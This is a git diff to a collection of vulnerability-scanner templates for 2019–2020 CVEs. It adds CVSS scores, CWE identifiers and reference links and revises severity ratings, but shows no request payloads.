CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-20141 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-2588.yaml b/cves/2019/CVE-2019-2588.yaml index cdc771e4c6..92c2d58019 100644 --- a/cves/2019/CVE-2019-2588.yaml +++ b/cves/2019/CVE-2019-2588.yaml @@ -3,11 +3,15 @@ id: CVE-2019-2588 info: name: Oracle Business Intelligence Path Traversal author: madrobot - severity: high + severity: medium tags: cve,cve2019,oracle,lfi reference: http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html description: | Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security) + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.90 + cve-id: CVE-2019-2588 requests: - method: GET diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml index 1d87fb5936..e8c42482e2 100644 --- a/cves/2019/CVE-2019-2616.yaml +++ b/cves/2019/CVE-2019-2616.yaml @@ -9,6 +9,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.20 + cve-id: CVE-2019-2616 requests: - raw: diff --git a/cves/2019/CVE-2019-2725.yaml b/cves/2019/CVE-2019-2725.yaml index 21ee150f0e..7fbac5b4c5 100644 --- a/cves/2019/CVE-2019-2725.yaml +++ b/cves/2019/CVE-2019-2725.yaml @@ -11,6 +11,11 @@ info: - https://paper.seebug.org/910/ - https://www.exploit-db.com/exploits/46780/ - https://www.oracle.com/security-alerts/cpujan2020.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-2725 + cwe-id: CWE-74 requests: - method: POST diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml index 3478b09508..48d47fda95 100644 --- a/cves/2019/CVE-2019-2767.yaml +++ b/cves/2019/CVE-2019-2767.yaml @@ -9,6 +9,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.20 + cve-id: CVE-2019-2767 requests: - raw: diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml index dd385d5b7f..9a4ba766ef 100644 --- a/cves/2019/CVE-2019-3396.yaml +++ b/cves/2019/CVE-2019-3396.yaml @@ -2,10 +2,15 @@ id: CVE-2019-3396 info: author: harshbothra_ name: Atlassian Confluence Path Traversal - severity: high + severity: critical description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection. reference: https://github.com/x-f1v3/CVE-2019-3396 tags: cve,cve2019,atlassian,confluence,lfi,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-3396 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2019/CVE-2019-3401.yaml b/cves/2019/CVE-2019-3401.yaml index 9c2a7c4819..9696be56d8 100644 --- a/cves/2019/CVE-2019-3401.yaml +++ b/cves/2019/CVE-2019-3401.yaml @@ -4,9 +4,14 @@ info: name: Atlassian JIRA Information Exposure (CVE-2019-3401) author: TechbrunchFR,milo2012 description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. - severity: info + severity: medium tags: cve,cve2019,jira,atlassian reference: https://jira.atlassian.com/browse/JRASERVER-69244 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-3401 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2019/CVE-2019-3402.yaml b/cves/2019/CVE-2019-3402.yaml index 9ca60822a2..ce14735982 100644 --- a/cves/2019/CVE-2019-3402.yaml +++ b/cves/2019/CVE-2019-3402.yaml @@ -7,6 +7,11 @@ info: description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter. reference: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c tags: cve,cve2019,atlassian,jira,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-3402 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-3403.yaml b/cves/2019/CVE-2019-3403.yaml index e554d89a9c..ebf4a42eea 100644 --- a/cves/2019/CVE-2019-3403.yaml +++ b/cves/2019/CVE-2019-3403.yaml @@ -7,6 +7,11 @@ info: description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. reference: https://jira.atlassian.com/browse/JRASERVER-69242 tags: cve,cve2019,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-3403 + cwe-id: CWE-863 requests: - method: GET diff --git a/cves/2019/CVE-2019-3799.yaml b/cves/2019/CVE-2019-3799.yaml index 8c8346a9e8..f4c662a765 100644 --- a/cves/2019/CVE-2019-3799.yaml +++ b/cves/2019/CVE-2019-3799.yaml @@ -2,12 +2,17 @@ id: CVE-2019-3799 info: name: Spring-Cloud-Config-Server Directory Traversal author: madrobot - severity: high + severity: medium description: Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. reference: - https://github.com/mpgn/CVE-2019-3799 - https://pivotal.io/security/cve-2019-3799 tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-3799 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-5127.yaml b/cves/2019/CVE-2019-5127.yaml index d283867419..07c1505179 100644 --- a/cves/2019/CVE-2019-5127.yaml +++ b/cves/2019/CVE-2019-5127.yaml @@ -7,6 +7,11 @@ info: description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917 tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-5127 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2019/CVE-2019-5418.yaml b/cves/2019/CVE-2019-5418.yaml index b6a5302242..51c1e78b62 100644 --- a/cves/2019/CVE-2019-5418.yaml +++ b/cves/2019/CVE-2019-5418.yaml @@ -3,12 +3,16 @@ id: CVE-2019-5418 info: name: File Content Disclosure on Rails author: omarkurt - severity: medium + severity: high description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ tags: cve,cve2019,rails,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-5418 requests: - method: GET diff --git a/cves/2019/CVE-2019-6112.yaml b/cves/2019/CVE-2019-6112.yaml index d8c76b9925..5b12bbdb90 100644 --- a/cves/2019/CVE-2019-6112.yaml +++ b/cves/2019/CVE-2019-6112.yaml @@ -7,6 +7,11 @@ info: description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field). reference: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b tags: cve,cve2019,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-6112 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-6340.yaml b/cves/2019/CVE-2019-6340.yaml index 515df72aee..d2b3c1a887 100644 --- a/cves/2019/CVE-2019-6340.yaml +++ b/cves/2019/CVE-2019-6340.yaml @@ -3,10 +3,15 @@ id: CVE-2019-6340 info: name: Drupal 8 core RESTful Web Services RCE author: madrobot - severity: critical + severity: high description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-6340 tags: cve,cve2019,drupal,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2019-6340 + cwe-id: CWE-502 requests: - method: POST diff --git a/cves/2019/CVE-2019-6715.yaml b/cves/2019/CVE-2019-6715.yaml index e004b0f931..16bbedcfc0 100644 --- a/cves/2019/CVE-2019-6715.yaml +++ b/cves/2019/CVE-2019-6715.yaml @@ -6,6 +6,13 @@ info: severity: high description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF tags: cve,cve2019,wordpress,wp-plugin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-6715 + reference: + - https://vinhjaxt.github.io/2019/03/cve-2019-6715 + - http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html requests: - raw: diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml index f97c0dc144..076926d4d7 100644 --- a/cves/2019/CVE-2019-7219.yaml +++ b/cves/2019/CVE-2019-7219.yaml @@ -3,13 +3,18 @@ id: CVE-2019-7219 info: name: Zarafa WebApp Reflected XSS author: pdteam - severity: low + severity: medium description: | Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead. reference: - https://github.com/verifysecurity/CVE-2019-7219 - https://stash.kopano.io/repos?visibility=public tags: cve,cve2019,zarafa,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-7219 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml index b989d29259..e6d8c9427e 100644 --- a/cves/2019/CVE-2019-7238.yaml +++ b/cves/2019/CVE-2019-7238.yaml @@ -8,6 +8,11 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - https://github.com/jas502n/CVE-2019-7238 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-7238 + description: "Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control." requests: - raw: diff --git a/cves/2019/CVE-2019-7254.yaml b/cves/2019/CVE-2019-7254.yaml index 1cf467a83d..8e6ffca73b 100644 --- a/cves/2019/CVE-2019-7254.yaml +++ b/cves/2019/CVE-2019-7254.yaml @@ -6,6 +6,12 @@ info: severity: high reference: https://www.exploit-db.com/exploits/47616 tags: emerge,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2019-7254 + cwe-id: CWE-22 + description: "Linear eMerge E3-Series devices allow File Inclusion." requests: - method: GET diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index a236e9b923..225bf2bb83 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/47619 - http://linear-solutions.com/nsc_family/e3-series/ # vendor homepage tags: cve,cve2019,emerge,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2019-7256 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2019/CVE-2019-7275.yaml b/cves/2019/CVE-2019-7275.yaml index 1945fe217d..c50714bebc 100644 --- a/cves/2019/CVE-2019-7275.yaml +++ b/cves/2019/CVE-2019-7275.yaml @@ -3,12 +3,18 @@ id: CVE-2019-7275 info: name: Open Redirect in Optergy Proton/Enterprise BMS author: 0x_Akoko - severity: low + severity: medium reference: - https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html - https://applied-risk.com/resources/ar-2019-008 - https://cxsecurity.com/issue/WLB-2019110074 tags: cve,cve2019,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-7275 + cwe-id: CWE-601 + description: "Optergy Proton/Enterprise devices allow Open Redirect." requests: - method: GET diff --git a/cves/2019/CVE-2019-7481.yaml b/cves/2019/CVE-2019-7481.yaml index 3f22173a79..7d6021e2bb 100644 --- a/cves/2019/CVE-2019-7481.yaml +++ b/cves/2019/CVE-2019-7481.yaml @@ -9,6 +9,11 @@ info: reference: - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/ tags: cve,cve2019,sonicwall,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-7481 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml index 97c3a627c3..8621f4e5a1 100644 --- a/cves/2019/CVE-2019-7609.yaml +++ b/cves/2019/CVE-2019-7609.yaml @@ -9,6 +9,11 @@ info: - https://github.com/mpgn/CVE-2019-7609 - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 tags: cve,cve2019,kibana,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2019-7609 + cwe-id: CWE-94 requests: - method: POST diff --git a/cves/2019/CVE-2019-8442.yaml b/cves/2019/CVE-2019-8442.yaml index 74622a2fa8..6effba17ec 100644 --- a/cves/2019/CVE-2019-8442.yaml +++ b/cves/2019/CVE-2019-8442.yaml @@ -2,10 +2,14 @@ id: CVE-2019-8442 info: name: JIRA Directory Traversal author: Kishore Krishna (siLLyDaddy) - severity: medium + severity: high description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check. reference: https://jira.atlassian.com/browse/JRASERVER-69241 tags: cve,cve2019,atlassian,jira,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-8442 requests: - method: GET diff --git a/cves/2019/CVE-2019-8446.yaml b/cves/2019/CVE-2019-8446.yaml index 1dd04da7ee..99959daaf4 100644 --- a/cves/2019/CVE-2019-8446.yaml +++ b/cves/2019/CVE-2019-8446.yaml @@ -6,6 +6,14 @@ info: author: dhiyaneshDk severity: medium tags: cve,cve2019,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-8446 + cwe-id: CWE-863 + reference: + - https://jira.atlassian.com/browse/JRASERVER-69777 + - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839 requests: - raw: diff --git a/cves/2019/CVE-2019-8449.yaml b/cves/2019/CVE-2019-8449.yaml index 9552542758..8467b0fa56 100644 --- a/cves/2019/CVE-2019-8449.yaml +++ b/cves/2019/CVE-2019-8449.yaml @@ -9,6 +9,11 @@ info: - https://www.doyler.net/security-not-included/more-jira-enumeration - https://jira.atlassian.com/browse/JRASERVER-69796 tags: cve,cve2019,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-8449 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index c13e0e6df5..7fe324b099 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -10,6 +10,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-69793 - https://hackerone.com/reports/713900 tags: cve,cve2019,atlassian,jira,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.50 + cve-id: CVE-2019-8451 + cwe-id: CWE-918 requests: - method: POST diff --git a/cves/2019/CVE-2019-8903.yaml b/cves/2019/CVE-2019-8903.yaml index 38120db1ea..c8648e91fe 100644 --- a/cves/2019/CVE-2019-8903.yaml +++ b/cves/2019/CVE-2019-8903.yaml @@ -10,6 +10,11 @@ info: - https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7 - https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b tags: cve,cve2019,totaljs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-8903 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml index 778a2e1312..3a09c5cd0b 100644 --- a/cves/2019/CVE-2019-8937.yaml +++ b/cves/2019/CVE-2019-8937.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://www.exploit-db.com/exploits/46429 tags: cve,cve2019,xss,hoteldruid + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-8937 + cwe-id: CWE-79 + description: "HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php." requests: - method: GET diff --git a/cves/2019/CVE-2019-8982.yaml b/cves/2019/CVE-2019-8982.yaml index 8af7a5e681..63269422cc 100644 --- a/cves/2019/CVE-2019-8982.yaml +++ b/cves/2019/CVE-2019-8982.yaml @@ -2,10 +2,15 @@ id: CVE-2019-8982 info: name: Wavemaker Studio 6.6 LFI/SSRF author: madrobot - severity: high + severity: critical description: com/wavemaker/studio/StudioService.java in WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value, leading to disclosure of local files and SSRF. reference: https://www.exploit-db.com/exploits/45158 tags: cve,cve2019,wavemaker,lfi,ssrf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.60 + cve-id: CVE-2019-8982 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2019/CVE-2019-9041.yaml b/cves/2019/CVE-2019-9041.yaml index 77491477a4..05c0ba21cc 100644 --- a/cves/2019/CVE-2019-9041.yaml +++ b/cves/2019/CVE-2019-9041.yaml @@ -9,6 +9,11 @@ info: - http://www.iwantacve.cn/index.php/archives/118/ - https://www.exploit-db.com/exploits/46454/ tags: cve,cve2019,zzzcms,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2019-9041 + cwe-id: CWE-917 requests: - method: POST diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 3c31a10ae9..58167af430 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -3,7 +3,7 @@ id: CVE-2019-9618 info: name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: critical description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 @@ -11,6 +11,11 @@ info: - https://www.exploit-db.com/exploits/46537 - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-9618 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml index 059f75bb43..baeb281791 100644 --- a/cves/2019/CVE-2019-9670.yaml +++ b/cves/2019/CVE-2019-9670.yaml @@ -6,6 +6,18 @@ info: author: ree4pwn severity: critical tags: cve,cve2019,zimbra,xxe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-9670 + cwe-id: CWE-611 + reference: + - https://www.exploit-db.com/exploits/46693/ + - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories + - https://bugzilla.zimbra.com/show_bug.cgi?id=109129 + - http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce + - http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html + - https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/ requests: - raw: diff --git a/cves/2019/CVE-2019-9733.yaml b/cves/2019/CVE-2019-9733.yaml index 7a4bf4d89d..91b8589da2 100644 --- a/cves/2019/CVE-2019-9733.yaml +++ b/cves/2019/CVE-2019-9733.yaml @@ -10,6 +10,10 @@ info: - https://www.ciphertechs.com/jfrog-artifactory-advisory/ - https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6 tags: cve,cve2019,artifactory + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-9733 requests: - raw: diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml index 5c6356d56d..ed6ed3a6cf 100644 --- a/cves/2019/CVE-2019-9955.yaml +++ b/cves/2019/CVE-2019-9955.yaml @@ -3,7 +3,7 @@ id: CVE-2019-9955 info: name: CVE-2019-9955 Zyxel XSS author: pdteam - severity: low + severity: medium tags: cve,cve2019,xss description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security firewall login page is vulnerable to Reflected XSS via the unsanitized 'mp_idx' parameter. reference: @@ -12,6 +12,11 @@ info: https://www.exploit-db.com/exploits/46706/ https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-9955 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-9978.yaml b/cves/2019/CVE-2019-9978.yaml index 871ea7acfb..4b3b772039 100644 --- a/cves/2019/CVE-2019-9978.yaml +++ b/cves/2019/CVE-2019-9978.yaml @@ -3,10 +3,15 @@ id: CVE-2019-9978 info: name: WordPress social-warfare RFI author: madrobot,dwisiswant0 - severity: critical + severity: medium description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro. reference: https://github.com/mpgn/CVE-2019-9978 tags: cve,cve2019,wordpress,wp-plugin,ssrf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-9978 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-0618.yaml b/cves/2020/CVE-2020-0618.yaml index b593db8f88..acbb89de1a 100644 --- a/cves/2020/CVE-2020-0618.yaml +++ b/cves/2020/CVE-2020-0618.yaml @@ -12,6 +12,11 @@ info: - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ - https://github.com/euphrat1ca/CVE-2020-0618 tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-0618 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2020/CVE-2020-10148.yaml b/cves/2020/CVE-2020-10148.yaml index f7958eb7cb..2aa69a564f 100644 --- a/cves/2020/CVE-2020-10148.yaml +++ b/cves/2020/CVE-2020-10148.yaml @@ -3,7 +3,7 @@ id: CVE-2020-10148 info: name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA) author: dwisiswant0 - severity: high + severity: critical description: | This template could allow to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. @@ -13,6 +13,11 @@ info: - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965 - https://twitter.com/0xsha/status/1343800953946787847 tags: cve,cve2020,solarwinds,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10148 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2020/CVE-2020-10546.yaml b/cves/2020/CVE-2020-10546.yaml index 658064e6d2..a7e3cdd179 100644 --- a/cves/2020/CVE-2020-10546.yaml +++ b/cves/2020/CVE-2020-10546.yaml @@ -2,12 +2,17 @@ id: CVE-2020-10546 info: name: rConfig 3.9.4 SQLi author: madrobot - severity: high + severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10546.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10546 + cwe-id: CWE-89,CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-10547.yaml b/cves/2020/CVE-2020-10547.yaml index 4213adc816..445f4d31d4 100644 --- a/cves/2020/CVE-2020-10547.yaml +++ b/cves/2020/CVE-2020-10547.yaml @@ -2,12 +2,17 @@ id: CVE-2020-10547 info: name: rConfig 3.9.4 SQLi author: madrobot - severity: high + severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10547 + 